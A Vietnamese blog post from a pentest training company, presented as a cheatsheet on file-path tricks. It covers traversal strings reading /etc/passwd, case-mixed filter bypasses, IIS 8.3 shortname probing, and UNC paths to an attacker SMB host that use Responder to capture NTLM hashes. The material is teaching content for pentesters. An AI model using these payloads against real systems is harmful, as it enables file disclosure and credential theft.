Logo CyberJutsu
Về chúng tôi
Học thử

File Path Pentest Cheatsheet

Technical Writer
Penetration Testing
File Path Pentest Cheatsheet

Khi nói về pentesting và Red Team, từng chi tiết kỹ thuật nhỏ như File Path thực tế đều là những điểm mấu chốt, nếu nắm rõ, nó sẽ trở thành "đòn bẩy" giúp bạn mở rộng phạm vi tấn công (attack surfaces), phát hiện những lỗi bảo mật tiềm ẩn và nâng cao hiệu quả của từng payload mà bạn sử dụng.

🚩 1. Path Separator

Trên Windows và Linux có dấu phân tách khác nhau:

  • Windows: \ (backslash)
  • Linux: / (forward slash)

Mặc dù Windows cũng hỗ trợ forward slash /, tuy nhiên vẫn có những trường hợp ứng dụng hoặc script xử lý sai lệch hoặc để sót dấu phân tách, gây ra các lỗ hổng Path Traversal (Directory Traversal).

🔑 Payload ví dụ:

../../../../etc/passwd ....\....\....\windows\system32\drivers\etc\hosts

Việc nắm rõ các dấu phân tách này giúp pentester nhanh chóng phát hiện và khai thác những lỗi liên quan tới xử lý đường dẫn trên ứng dụng web hoặc dịch vụ back-end.

🚩 2. Case-Sensitivity

Linux phân biệt chữ hoa và chữ thường, trong khi Windows thì không.

Điều này quan trọng khi bạn khai thác các lỗ hổng Local File Inclusion (LFI) hoặc Remote File Inclusion (RFI) trên hệ thống Linux, đôi khi developer chỉ dùng blacklist hoặc whitelist dạng lowercase, một payload tinh chỉnh chữ hoa-thường là chìa khóa để bypass các filter:

🔑 Payload ví dụ:

/EtC/PaSsWd

Nếu hệ thống blacklist cụ thể /etc/passwd, payload như trên vẫn có thể giúp bạn bypass để truy cập vào các file nhạy cảm.

🚩 3. "8.3" Short Filename (SFN)

Đây là một tính năng đặc biệt của Windows kế thừa từ MS-DOS, hệ thống tự động tạo tên file ngắn (SFN - Short File Name) có định dạng 8 ký tự + 3 ký tự mở rộng (ví dụ PROGRA~1 thay vì Program Files).

Attack Vector nổi bật nhất: Tấn công vào Webserver IIS (Internet Information Services) của Windows, sử dụng SFN để tìm kiếm những file nhạy cảm bị ẩn hoặc bypass cơ chế bảo vệ.

🔑 Payload thực tế:

  • Dùng tool scan SFN (Shortname Scanner):

GET /shortname~1*/.aspx HTTP/1.1 Host: victim.com

Điển hình là các nghiên cứu và công cụ như:

  • https://github.com/irsdl/IIS-ShortName-Scanner
  • DirBuster (phiên bản SFN scan)
  • https://github.com/bitquark/shortscan

Ví dụ khai thác một case IIS từ research thực tế:

Original: C:\inetpub\wwwroot\adminpanel

SFN: C:\inetpub\wwwroot\ADMINP~1

Dùng payload để phát hiện và truy cập directory nhạy cảm:

http://victim.com/ADMINP~1/

Với kỹ thuật này, pentester có thể truy cập được những file/directories nhạy cảm đã được bảo vệ thông qua blacklist hoặc whitelist thông thường.

🚩 4. UNC Path Exploitation

UNC (Uniform Naming Convention) là chuẩn Windows sử dụng để truy cập tài nguyên mạng từ xa, có dạng: \\server\share\path\to\file.txt

UNC Path mở ra nhiều khả năng khai thác khi ứng dụng xử lý không đúng cách, phổ biến là lỗ hổng SMB Relay Attack hoặc NTLM Hash Leak.

🔑 Payload ví dụ:

  • Khai thác NTLM Relay qua UNC: \\attacker_ip\evilshare

Khi ứng dụng xử lý file UNC Path này, nó sẽ tự động gửi NTLM hash tới server SMB của attacker, từ đó attacker có thể relay để leo quyền hoặc lấy được hash NTLM để crack offline.

Ví dụ khai thác payload SMB Relay thực tế:

  • SMB server độc hại sử dụng Responder hoặc Impacket:

sudo responder -I eth0

  • Payload tiêm vào ứng dụng (như xử lý ảnh, tải file từ xa…):

\\192.168.attacker\share\evil.jpg

Ứng dụng truy cập đường dẫn này sẽ gửi credentials tới SMB server, và attacker có thể chiếm đoạt thông tin.

🎯 Ý nghĩa với Pentester và Red Teamer

Việc hiểu sâu sắc những điểm trên giúp pentester và red teamer tận dụng hiệu quả các kỹ thuật tấn công như:

  • Bypass các filter yếu thông qua trick Path separator và Case-sensitive.
  • Phát hiện và khai thác tài nguyên ẩn qua Short File Name (SFN).
  • Mở rộng bề mặt tấn công (attack surfaces) bằng cách lợi dụng các UNC Path để thực hiện NTLM Relay và SMB exploitation.

Các kiến thức này khi được áp dụng chính xác, có thể tạo ra các bước ngoặt lớn trong pentest, mở ra cánh cửa tới những payload hiệu quả và tìm thấy các điểm yếu mà hầu hết các pentester thông thường dễ dàng bỏ qua.

Tip:
Luôn kết hợp sử dụng các công cụ như Shortname Scanner, Responder, Impacket với sự linh hoạt trong xử lý ký tự và đường dẫn để tối đa hóa sức mạnh payload của bạn.

🔻 Nhớ rằng: Những chi tiết tưởng như rất nhỏ đôi khi chính là chìa khóa để tạo ra bước đột phá lớn trong mỗi cuộc pentest.

Các khóa học về Kiểm thử (Penetration Testing) và Red Team Operation:

Albert Einstein

"Education is not the learning of facts,
but the training of the mind to think"


CÔNG TY CỔ PHẦN CYBER JUTSU

Số 3 Nguyễn Xuân Ôn, Phường 2, Quận Bình Thạnh, TP Hồ Chí Minh

Mã số thuế: 0314377455

Hotline: 0906622416

Phản ánh chất lượng dịch vụ: 0906622416

Email liên hệ: contact@cyberjutsu.io

Chịu trách nhiệm nội dung: Nguyễn Mạnh Luật

Khóa học

Web Penetration Testing

Red Team - Exploit 101

1DAY ANALYSIS

Lộ trình học tập

Tất cả khóa học

Cộng đồng

Blog

Videos

Cảm nhận học viên

Hall of Fame

Kiểm tra kiến thức

Liên hệ

Chính sách

Lớp học Live Online

Flipped Classroom

Chương trình giới thiệu

Xem tất cả chính sách

Copyright © 2025 CyberJutsu JSC. All Rights Reserved.